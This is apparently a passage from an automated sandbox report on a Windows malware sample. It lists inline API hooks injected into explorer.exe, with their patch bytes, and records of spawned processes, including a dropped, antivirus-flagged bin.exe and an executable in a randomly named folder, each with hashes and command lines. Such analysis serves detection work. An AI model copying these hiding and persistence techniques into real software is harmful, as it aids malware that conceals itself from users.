                                                                                                                                                              Data Ascii: <ClientInstRequest><CID>6666694284484FA1B35CCB433D42E997</CID><Events><E><T>Event.ClientInst</T><IG>892FA07886414BDF8EE1764A59FF39C6</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"C
                                                                                                                                                              2024-01-20 19:41:15 UTC476INHTTP/1.1 204 No Content
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                              X-MSEdge-Ref: Ref A: CF9ECD651A424BE58C4A719B779CD7A9 Ref B: LAXEDGE1720 Ref C: 2024-01-20T19:41:15Z
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:15 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                              X-CDN-TraceID: 0.20a6dc17.1705779675.1a1d24f5


                                                                                                                                                              Code Manipulations

                                                                                                                                                              User Modules

                                                                                                                                                              Hook Summary

                                                                                                                                                              Function NameHook TypeActive in Processes
                                                                                                                                                              ZwResumeThreadINLINEexplorer.exe
                                                                                                                                                              NtQueryDirectoryFileINLINEexplorer.exe
                                                                                                                                                              ZwEnumerateValueKeyINLINEexplorer.exe
                                                                                                                                                              NtResumeThreadINLINEexplorer.exe
                                                                                                                                                              ZwCreateUserProcessINLINEexplorer.exe
                                                                                                                                                              NtEnumerateValueKeyINLINEexplorer.exe
                                                                                                                                                              NtCreateUserProcessINLINEexplorer.exe
                                                                                                                                                              ZwQueryDirectoryFileINLINEexplorer.exe

                                                                                                                                                              Processes

                                                                                                                                                              Process: explorer.exe, Module: ntdll.dll
                                                                                                                                                              Function NameHook TypeNew Data
                                                                                                                                                              ZwResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
                                                                                                                                                              NtQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91
                                                                                                                                                              ZwEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
                                                                                                                                                              NtResumeThreadINLINE0xE9 0x9E 0xE1 0x12 0x25 0x51
                                                                                                                                                              ZwCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
                                                                                                                                                              NtEnumerateValueKeyINLINE0xE9 0x9C 0xC1 0x12 0x2D 0xD1
                                                                                                                                                              NtCreateUserProcessINLINE0xE9 0x93 0x31 0x11 0x17 0x71
                                                                                                                                                              ZwQueryDirectoryFileINLINE0xE9 0x98 0x81 0x12 0x29 0x91

                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:20:40:52
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\java.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\Desktop\java.exe
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5 hash:B471D5F706DF69A4A28664D7E335A9DA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:1
                                                                                                                                                              Start time:20:40:52
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:20:40:52
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:winver
                                                                                                                                                              Imagebase:0x330000
                                                                                                                                                              File size:57'344 bytes
                                                                                                                                                              MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:3
                                                                                                                                                              Start time:20:40:53
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:4
                                                                                                                                                              Start time:20:41:01
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\sihost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:sihost.exe
                                                                                                                                                              Imagebase:0x7ff796ef0000
                                                                                                                                                              File size:111'616 bytes
                                                                                                                                                              MD5 hash:A21E7719D73D0322E2E7D61802CB8F80
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:20:41:01
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:20:41:01
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:20:41:02
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\ctfmon.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:ctfmon.exe
                                                                                                                                                              Imagebase:0x7ff7e3b00000
                                                                                                                                                              File size:11'264 bytes
                                                                                                                                                              MD5 hash:B625C18E177D5BEB5A6F6432CCF46FB3
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:20:41:02
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:20:41:02
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                              Imagebase:0x7ff7da970000
                                                                                                                                                              File size:793'416 bytes
                                                                                                                                                              MD5 hash:5CDDF06A40E89358807A2B9506F064D9
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:20:41:04
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:20:41:04
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                              Imagebase:0x7ff6fdaa0000
                                                                                                                                                              File size:3'671'400 bytes
                                                                                                                                                              MD5 hash:5E1C9231F1F1DCBA168CA9F3227D9168
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:20:41:13
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5 hash:CC18A03FCBC9DCF9DF31B64689EB3E55
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:20:41:13
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:20:41:18
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:20:41:19
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\smartscreen.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\smartscreen.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff7d45b0000
                                                                                                                                                              File size:2'378'752 bytes
                                                                                                                                                              MD5 hash:02FB7069B8D8426DC72C9D8A495AF55A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:20:41:20
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
                                                                                                                                                              Imagebase:0x7ff794e20000
                                                                                                                                                              File size:19'232 bytes
                                                                                                                                                              MD5 hash:F050189D49E17D0D340DE52E9E5B711F
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:20:41:21
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\0C0BC82C\bin.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:112'768 bytes
                                                                                                                                                              MD5 hash:CC18A03FCBC9DCF9DF31B64689EB3E55
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:20:41:21
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:20:41:21
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:23
                                                                                                                                                              Start time:20:41:23
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:24
                                                                                                                                                              Start time:20:41:23
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\ApplicationFrameHost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff7d5d50000
                                                                                                                                                              File size:78'456 bytes
                                                                                                                                                              MD5 hash:D58A8A987A8DAFAD9DC32A548CC061E7
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:20:41:27
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca
                                                                                                                                                              Imagebase:0x7ff63cc40000
                                                                                                                                                              File size:19'456 bytes
                                                                                                                                                              MD5 hash:6C44453CD661FC2DB18E4C09C4940399
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:26
                                                                                                                                                              Start time:20:41:28
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:27
                                                                                                                                                              Start time:20:41:28
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                                                              Imagebase:0x7ff614e70000
                                                                                                                                                              File size:98'104 bytes
                                                                                                                                                              MD5 hash:3CD3CD85226FCF576DFE9B70B6DA2630
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:28
                                                                                                                                                              Start time:20:41:31
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff69a060000
                                                                                                                                                              File size:57'856 bytes
                                                                                                                                                              MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:29
                                                                                                                                                              Start time:20:41:32
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:30
                                                                                                                                                              Start time:20:41:32
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                              Imagebase:0x7ff70f330000
                                                                                                                                                              File size:21'312 bytes
                                                                                                                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:31
                                                                                                                                                              Start time:20:41:33
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus
                                                                                                                                                              Imagebase:0xc60000
                                                                                                                                                              File size:144'896 bytes
                                                                                                                                                              MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:32
                                                                                                                                                              Start time:20:41:33
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:33
                                                                                                                                                              Start time:20:41:33
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0x4
                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:34
                                                                                                                                                              Start time:20:41:34
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\backgroundTaskHost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
                                                                                                                                                              Imagebase:0x7ff6ec4b0000
                                                                                                                                                              File size:19'776 bytes
                                                                                                                                                              MD5 hash:DA7063B17DBB8BBB3015351016868006
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:35
                                                                                                                                                              Start time:20:41:34
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              General

                                                                                                                                                              Target ID:36
                                                                                                                                                              Start time:20:41:35
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                              Imagebase:0x7ff71e800000
                                                                                                                                                              File size:103'288 bytes
                                                                                                                                                              MD5 hash:BA4CFE6461AFA1004C52F19C8F2169DC
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:37
                                                                                                                                                              Start time:20:41:35
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:38
                                                                                                                                                              Start time:20:41:35
                                                                                                                                                              Start date:20/01/2024
                                                                                                                                                              Path:C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Program Files (x86)\UEZVPAWBrVuxNtrMwzEvCsWkYCyFbIKeGSMxqYElFJBZQmOcXHXKNlbXOsnnzpaFjUa\BjCNEZCMnwLaEEzWr.exe"
                                                                                                                                                              Imagebase:0xba0000
                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              General

                                                                                                                                                              Target ID:39
                                                                                                                                                              Start time:20:41:36
